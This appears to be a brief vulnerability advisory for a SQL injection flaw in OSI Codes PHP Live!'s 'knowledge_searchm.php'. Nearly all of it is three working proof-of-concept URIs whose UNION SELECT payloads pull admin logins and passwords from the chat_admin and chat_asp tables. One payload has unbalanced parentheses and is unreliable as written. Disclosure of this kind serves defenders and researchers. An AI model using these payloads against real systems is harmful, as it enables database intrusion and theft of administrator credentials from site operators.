OSI Codes PHP Live! 'knowledge_searchm.php' SQL Injection Vulnerability

OSI Codes PHP Live! 'knowledge_searchm.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URIs are available:

http://www.example.com/admin/traffic/knowledge_searchm.php?l=phplive&x=1&action=expand_question&questid=-1+union+all+select+1,2,3,4,5,6,concat(login,char(5,password),8+from+chat_admin--&deptid=2&catid=1&keyword=a

http://www.example.com/path-to-phplive/admin/traffic/knowledge_searchm.php?action=expand_question&l=admin&x=1&questid=-1/**/union/**/all/**/select/**/1,2,3,4,5,6,7,concat%28login,char%2858%29,password%29/**/from/**/chat_asp%20limit%200,1

http://www.example.com/path-to-phplive/admin/traffic/knowledge_searchm.php?action=expand_question&l=admin&x=1&questid=-1/**/union/**/all/**/select/**/1,2,3,4,5,6,7,concat%28login,char%2858%29,password%29/**/from/**/chat_admin%20limit%200,1